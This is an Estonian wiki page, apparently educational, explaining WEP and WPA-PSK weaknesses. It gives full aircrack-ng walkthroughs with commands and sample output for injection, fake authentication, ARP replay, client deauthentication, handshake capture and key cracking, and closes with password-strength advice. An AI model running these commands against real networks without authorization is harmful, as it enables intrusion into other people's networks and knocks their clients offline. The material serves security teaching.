|
|
Line 1: |
Line 1: |
| == WPA/WPA2 ==
| |
|
| |
|
|
| |
| Järgmise põlvkonna meetod krüpteerimaks traadita võrke (''WiFi'') on '''WPA''' ehk ''Wi-Fi Protected Access''. Teadagi, pole ükski süsteem perfektne. Kõige lihtsam viis kasutamaks WPA krüpteeringut tundub olevat tema suurim viga ning selleks on ''Pre-Shared Key'' (PSK). WPA-PSK lubab administraatoril kindlaks määrata salasõna, mis peab olema teada igale ''Access Point'' kasutajale. ''Access Point'' on seade, mis lubab traadita võrke kasutavaid vahendeid ühendada võrku kasutades selleks kas WiFi’t, Bluetoothi vms. WPA-PSK kasutades ollakse avatud rünnakutele (''offline dictionary attack''), kus ründaja loeb pakette ajal, mil keegi ühendab ennast võrku ning kasutades neid pakette on võimalik taastada ''Pre-Shared Key'' ehk salasõna. Seda juhul, kui määratud salasõna ei ole liiga pikk. Tüüpiline viga, mida inimesed teevad, kui nad omale salasõna valivad on see, et nad kasutavad lihtsaid sõnu, fraase, mis on lühikesed ja ei sisalda numbreid või sümboleid. Taolised salasõnad on ''dictionary attack'' tehnikale maiuspalaks. On olemas palju erinevaid vahendeid ja tööriistu sellise protsessi läbiviimiseks. Üks tõhusamaid minu enda kogemuse põhjal on '''Aircrack'''. See on kogumik erinevatest tööriistadest:
| |
|
| |
| • '''Airodump''': programm pakettide püüdmiseks
| |
|
| |
| • '''Aireplay''': programm pakettide „süstimiseks“
| |
|
| |
| • '''Aircrack''': staatiline WEP ja WPA-PSK võtme kräkkija
| |
|
| |
| • '''Airdecap''': WEP/WPA püütud failide dekrüptimiseks
| |
|
| |
| Krüpteeritud võrgu häkkimise aeg sõltub liiklusest võrgus (''traffic''). Mida vähem liiklust, seda rohkem läheb aega andmete kogumiseks ning vastupidi. Sellepärast kasutataksegi Aireplay tööriista. See on vahend liikluse tekitamiseks või genereerimiseks. Aireplay võimaldab suurendada liiklust, mistõttu kiireneb ka kogu kräkkimise protsess.
| |
| Üks tähtis eripära WPA/WPA2 ja WEP kräkkimise vahel on lähenemisviis kräkkimaks WPA/WPA2 Pre-Shared võtit (''Pre-Shared Key''). Kui WEP kräkkimisel saab kiirendada protsessi staatiliste meetoditega, siis WPA/WPA2 puhul on ainsaks abiks ''plain brute force'' tehnikad ehk nö. toore-jõu tehnikad. See on sellepärast, et võti ei ole staatiline – protsessi kiirendamine ei ole võimalik nii nagu WEP kräkkimisel. Ainus viis info saamiseks on ühendus kliendi ja ''Access Point'' vahel (''handshake''). ''Handshake'' toimub, kui klient ühendab võrguga. Kuna salasõna võib olla 8 kuni 63 tähemärki, siis muutub WPA/WPA2 kräkkimine võimatuks, kui salasõna koosneb 63 suvaliselt genereeritud tähemärgist ja sümbolist. Ehk kui salasõna on võimalikult lühike ja ei sisaldada palju numbreid on veel võimalik nimetatud protsess läbi viia. Arvuti suudab testida 50 kuni 300 võimalikku võtit sekundis olenevalt arvutist. Pikkade salasõnade kräkkimine võib aega võtta tunde, päevi isegi aastaid. Lähemalt võib arvutada siit: [http://lastbit.com/pswcalc.asp]
| |
|
| |
|
| |
|
| |
| == WEP ==
| |
|
| |
| '''WEP''' (''wired equivalent privacy'') on krüpteerimismeetod traadita võrkude kaitseks. Tegemist on väga vana ning algelise kaitsega, mistõttu on seda lihtne lahti kräkkida. WEP’il on kolm seadistust: off ehk kaitse maas, 64-bit ehk nõrk kaitse ning 128-bit ehk natukene tugevam kaitse. Kui WEP on off staadiumis, siis võib iga suvaline inimene ennast võrku ühendada. Kasutades kas 64-bit või 128-bit kaitset on teoreetiliselt võrk siiski kaitstud, kuid reaalselt ei ole vahet, kas kasutatakse 64-bit või 128-bit kaitset, sest mõlemad võtmed on ühtemoodi kräkitavad. WEP’i kräkkimisprotsess baseerub '''IV'''’del ehk ''Initalization Vector''itel. Kogudes piisavalt palju IV’si on WEP kräkkimine vaid aja küsimus.
| |
|
| |
|
| |
| == Näide WEP kräkkimise protsessist ==
| |
|
| |
| '''Eeldused:'''
| |
|
| |
| • Õiged driverid, et viia läbi „süstimine“ (''injection'')
| |
|
| |
| • Ollakse füüsiliselt piisavalt lähedale Access Pointile
| |
|
| |
| • Kasutatakse v0.9.1 või suuremat versiooni aircrack-ng’st
| |
|
| |
| • Kasutatakse Linuxit aircrack jaoks
| |
|
| |
| • Võrgus on vähemalt 1 aktiivne klient
| |
|
| |
| '''Alustamine:'''
| |
|
| |
| Soovitav on üles märkida järgmised andmed:
| |
|
| |
| • Arvuti MAC aadress, mis jooksutab aircrack-ng'd (''näide: 00:0F:B5:88:AC:82'')
| |
|
| |
| • BSSID (Access Point MAC aadress (''näide: 00:14:6C:7E:40:80'')
| |
|
| |
| • ESSID (''võrgu nimi'') (''näide: metsaloomad'')
| |
|
| |
| • Access Point’i kanal (''näide: 9'')
| |
|
| |
| • Wireless interface (''näide: ath0'')
| |
|
| |
| '''Lahendus:'''
| |
|
| |
| Eesmärgiks on püüda kinni võimalikult palju IV’si. Tavaliselt ei genereerita neid IV’si just väga kiiresti normaalse võrguliikluse (''network traffic'') puhul. Kuna me oleme kannatamatud, siis kasutatakse siinkohal „süstimise“ (''injection'') tehnikat, et protsessi kiirendada. Selle tehnika puhul saadab Access Point valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda võimalikult palju IV’si võimalikult vähese ajaga.
| |
|
| |
| '''Sammud selleks:'''
| |
|
| |
| • Seadistada ennast kindlale Access Point kanalile (''näiteks siin 9'')
| |
|
| |
| • Testida „süstimise“ suutlikkust Access pointile
| |
|
| |
| • Kasutada aireplay-ng'd vale audentimise läbiviimiseks Access Pointiga
| |
|
| |
| • Panna tööle airodump-ng sellel Access Point kanalil koos BSSID filtriga, kogumaks IV’si
| |
|
| |
| • Kasutada aireplay-ng'd pakettide süstimiseks
| |
|
| |
| • Kasutada aircrack-ng'd kräkkimaks salasõna, kasutades ära kogutud IV’si
| |
|
| |
|
| |
| Esmalt tuleb avada konsooli aken ning oma wifi kaart panna seisundisse ''monitor mode''. See on seisund, kus kaart kuulab igat paketti. Igat paketti kuulates on võimalik valida välja mõned neist et viia läbi „süstimine“. Kirjutades käsureale '''airmon-ng stop ath0''' peaks tulema taoline vastus:
| |
|
| |
| Interface Chipset Driver
| |
|
| |
| wifi0 Atheros madwifi-ng
| |
| ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
| |
|
| |
| Tuleb sulgeda kõik athX. Kui on suletud kõik athX ning kirjutades käsureale '''iwconfig''' peaks tulemus olema:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| Seejärel seadistame võrgukaardi 9-ndale kanalile käsuga''' airmon-ng start wifi0 9''' ning sisestame uuesti kontrollimiseks '''iwconfig'''
| |
| Tulemus peaks olema taoline:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| ath0 IEEE 802.11g ESSID:"" Nickname:""
| |
| Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
| |
| Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
| |
| Retry:off RTS thr:off Fragment thr:off
| |
| Encryption key:off
| |
| Power Management:off
| |
| Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
| |
| Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
| |
| Tx excessive retries:0 Invalid misc:0 Missed beacon:0
| |
|
| |
| Järgnevalt tuleb testida „süstimise“ suutlikkust Access pointile. Selle sammu eesmärgiks on selgitada, kas ollakse piisavalt lähedal Access pointile, et sinna pakette „süstida“. Käsureale tuleb sisestada '''aireplay-ng -9 -e metsaloomad -a 00:14:6C:7E:40:80 ath0'''
| |
| Vastus peaks välja nägema:
| |
|
| |
| 09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
| |
| 09:23:35 Trying broadcast probe requests...
| |
| 09:23:35 Injection is working!
| |
| 09:23:37 Found 1 AP
| |
|
| |
| 09:23:37 Trying directed probe requests...
| |
| 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'metsaloomad'
| |
| 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
| |
| 09:23:39 30/30: '''100%'''
| |
|
| |
| Viimane rida näitab, kas ollakse piisavalt lähedal või mitte ning kas on võimalik viia läbi „süstimine“. Järgnevalt püütakse IV’si, kasutades selleks airodump-ng’d. Selleks kirjutatakse uude konsooli aknasse '''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0''' Kui „süstimine“ õnnestub on mingi aja vältel tulemuseks:
| |
|
| |
|
| |
| CH 9 ][ Elapsed: 8 mins ][ 2010-03-21 19:25
| |
|
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
| |
|
| |
| 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP metsaloomad
| |
|
| |
| BSSID STATION PWR Lost Packets Probes
| |
|
| |
| 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
| |
|
| |
| Kasutades aireplay-ng’d luuakse võlts audentimine Access Pointiga. Selleks trükitakse uude konsooli aknasse järgmine käsurida '''aireplay-ng -1 0 -e metsaloomad -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'''
| |
|
| |
| (''variatsioon sellest: aireplay-ng -1 6000 -o 1 -q 10 -e metsaloomad -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'')
| |
|
| |
| Õnnestumise korral on tulemuseks:
| |
|
| |
| 18:18:20 Sending Authentication Request
| |
| 18:18:20 Authentication successful
| |
| 18:18:20 Sending Association Request
| |
| 18:18:20 Association successful :-)
| |
|
| |
| Ebaõnnestumise korral on tulemuseks:
| |
|
| |
| 8:28:02 Sending Authentication Request
| |
| 18:28:02 Authentication successful
| |
| 18:28:02 Sending Association Request
| |
| 18:28:02 Association successful :-)
| |
| 18:28:02 Got a deauthentication packet!
| |
| 18:28:05 Sending Authentication Request
| |
| 18:28:05 Authentication successful
| |
| 18:28:05 Sending Association Request
| |
| 18:28:10 Sending Authentication Request
| |
| 18:28:10 Authentication successful
| |
| 18:28:10 Sending Association Request
| |
|
| |
| Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ''ARP requeste'', et neid siis tagasi võrku „süstida“. Selleks kirjutatakse uude konsooli aknasse '''aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'''
| |
| Tulemus peaks välja nägema selline:
| |
|
| |
| Saving ARP requests in replay_arp-0321-191525.cap
| |
| You should also start airodump-ng to capture replies.
| |
| Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
| |
|
| |
| Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV’de põhjal. Selleks avatakse uus konsooli aken ning sisestatakse '''aircrack-ng -b 00:14:6C:7E:40:80 output*.cap'''
| |
| Tulemus on järgmine:
| |
|
| |
|
| |
| [00:03:06] Tested 674449 keys (got 96610 IVs)
| |
|
| |
| KB depth byte(vote)
| |
| 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
| |
| 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
| |
| 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
| |
| 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
| |
|
| |
| KEY FOUND! [ '''12''':'''34''':'''56''':'''78''':'''90''' ]
| |
| Probability: 100%
| |
|
| |
|
| |
| == Näide WPA kräkkimise protsessist ==
| |
|
| |
| '''Eeldused:'''
| |
|
| |
| • Õiged driverid, et viia läbi „süstimine“ (''injection'')
| |
|
| |
| • Ollakse füüsiliselt piisavalt lähedale Access Pointile
| |
|
| |
| • Kasutatakse v0.9.1 või suuremat versiooni aircrack-ng’st
| |
|
| |
| • Kasutatakse Linuxit aircrack jaoks
| |
|
| |
| '''Alustamine:'''
| |
|
| |
| Soovitav on üles märkida järgmised andmed:
| |
|
| |
| • Arvuti MAC aadress, mis jooksutab aircrack-ng (''näide: 00:0F:B5:88:AC:82'')
| |
|
| |
| • Kliendi MAC aadress, kes kasutab WPA/WPA2 (''näide: 00:0F:B5:FD:FB:C2'')
| |
|
| |
| • BSSID (Access Point MAC aadress (''näide: 00:14:6C:7E:40:80'')
| |
|
| |
| • ESSID (''võrgu nimi'') (''näide: metsaloomad'')
| |
|
| |
| • Access Point’i kanal (''näide: 9'')
| |
|
| |
| • Wireless interface (''näide: ath0'')
| |
|
| |
| '''Lahendus:'''
| |
|
| |
| Eesmärgiks on püüda kinni WPA/WPA2 audentimise ''handshake'' ning seejärel kasutades aircrack-ng'd leida ''Pre-Shared Key'' või salasõna.
| |
|
| |
| '''Sammud selleks:'''
| |
|
| |
| • Seadistada ennast kindlale Access Point kanalile (''näiteks siin 9'')
| |
|
| |
| • Panna tööle airodump-ng sellel Access Point kanalil koos BSSID filtriga, kogumaks audentimise käepigistust (''handshake'')
| |
|
| |
| • Kasutada aireplay-ng kliendi deaudentimiseks
| |
|
| |
| • Kasutada aircrack-ng kräkkimaks salasõna kasutades ära ''handshake''’i
| |
|
| |
| Esmalt tuleb avada konsooli aken ning oma wifi kaart panna seisundisse ''monitor mode''. See on seisund, kus kaart kuulab igat paketti. Igat paketti kuulates on võimalik leida ''handshake''. Kirjutades käsureale '''airmon-ng''' peaks tulema vastuseks:
| |
|
| |
| Interface Chipset Driver
| |
|
| |
| rausb0 Ralink RT73 rt73
| |
| wlan0 Broadcom b43 - [phy0]
| |
| wifi0 Atheros madwifi-ng
| |
| ath0 Atheros madwifi-ng VAP (parent: wifi0)
| |
|
| |
| Kõigepealt tuleb sulgeda kõik athX. Siinkohal kirjutame käsureale '''airmon-ng stop ath0''' Kui on suletud kõik athX ning kirjutades käsureale '''iwconfig''' peaks tulemus olema:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| Seejärel seadistame võrgukaardi 9-ndale kanalile käsuga '''airmon-ng start wifi0 9''' ning sisestame uuesti kontrollimiseks '''iwconfig'''
| |
| Tulemus peaks olema midagi sellist:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| ath0 IEEE 802.11g ESSID:"" Nickname:""
| |
| Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
| |
| Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
| |
| Retry:off RTS thr:off Fragment thr:off
| |
| Encryption key:off
| |
| Power Management:off
| |
| Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
| |
| Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
| |
| Tx excessive retries:0 Invalid misc:0 Missed beacon:0
| |
|
| |
|
| |
| Järgmiseks kasutatakse airodump-ng'd ''handshake'' kogumiseks (''uus konsooli aken''): '''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0'''
| |
|
| |
| Õnnestunud ''handshake'' korral on tulemus:
| |
|
| |
| CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
| |
|
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
| |
|
| |
| 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK metsaloomad
| |
|
| |
| BSSID STATION PWR Lost Packets Probes
| |
|
| |
| 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
| |
|
| |
| Ebaõnnestunud ''handshake'' korral on tulemus:
| |
|
| |
| CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
| |
|
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
| |
|
| |
| 00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK metsaloomad
| |
|
| |
| BSSID STATION PWR Lost Packets Probes
| |
|
| |
| Siit edasi kasutatakse aireplay-ng'd, et deaudentida klient. See osa on valikuline, sest võib jääda ka ootama, kuni airodump-ng püüab kinni ''handshake''’i. Protsessi kiirendamiseks tuleb uude konsooli aknasse kirjutada '''aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0''' , mille tulemus peaks olema:
| |
|
| |
| 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
| |
|
| |
| Viimaks, kui on püütud kinni ''handshake'' proovitakse salasõna kräkkida. Selleks avatakse uus konsooli aken ning trükitakse '''aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap'''
| |
| Kui ''handshake''’i pole püütud on vastuseks:
| |
|
| |
| Opening psk-01.cap
| |
| Opening psk-02.cap
| |
| Opening psk-03.cap
| |
| Opening psk-04.cap
| |
| Read 1827 packets.
| |
|
| |
| No valid WPA handshakes found.
| |
|
| |
| Sellisel juhul tuleb teha uuesti kliendi deaudentimine. Kui ''handshake'' püüti kinni, siis tulemus on selline:
| |
|
| |
| Opening psk-01.cap
| |
| Opening psk-02.cap
| |
| Opening psk-03.cap
| |
| Opening psk-04.cap
| |
| Read 1827 packets.
| |
|
| |
| # BSSID ESSID Encryption
| |
|
| |
| 1 00:14:6C:7E:40:80 metsaloomad WPA (1 handshake)
| |
|
| |
| Choosing first network as target.
| |
|
| |
| Siinkohal proovib aircrack-ng salasõna lahti kräkkida. See võib võtta tunde või isegi päevi. Õnnestumise korral on vastus selline:
| |
|
| |
| Aircrack-ng 0.8
| |
|
| |
|
| |
| [00:00:00] 2 keys tested (37.20 k/s)
| |
|
| |
|
| |
| KEY FOUND! [ '''12345678''' ]
| |
|
| |
|
| |
| Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
| |
| B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
| |
|
| |
| Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
| |
| CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
| |
| FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
| |
| 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
| |
|
| |
| EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
| |
|
| |
| Selleks, et oma võrku piisavalt hästi kaitsta, tuleks kindlasti eelistada WPA’d WEP’ile. Soovitav on kasutada salasõnas kombinatsioone tähtedest, numbritest ja sümbolitest ning valida võtmed, mis on piisavalt pikad, et muuta nende kräkkimine praktiliselt võimatuks.
| |
|
| |
|
| |
| == Kasutatud kirjandus ==
| |
|
| |
|
| |
| http://it.toolbox.com/blogs/unwired/wpa-encryption-cracking-7419
| |
|
| |
| http://it.toolbox.com/blogs/unwired/cracking-wpapsk-6730
| |
|
| |
| http://www.aircrack-ng.org/doku.php?id=cracking_wpa
| |
|
| |
| http://connect-connect.blogspot.com/2007/09/wireless-security-insight-into-wep.html
| |
|
| |
| http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
| |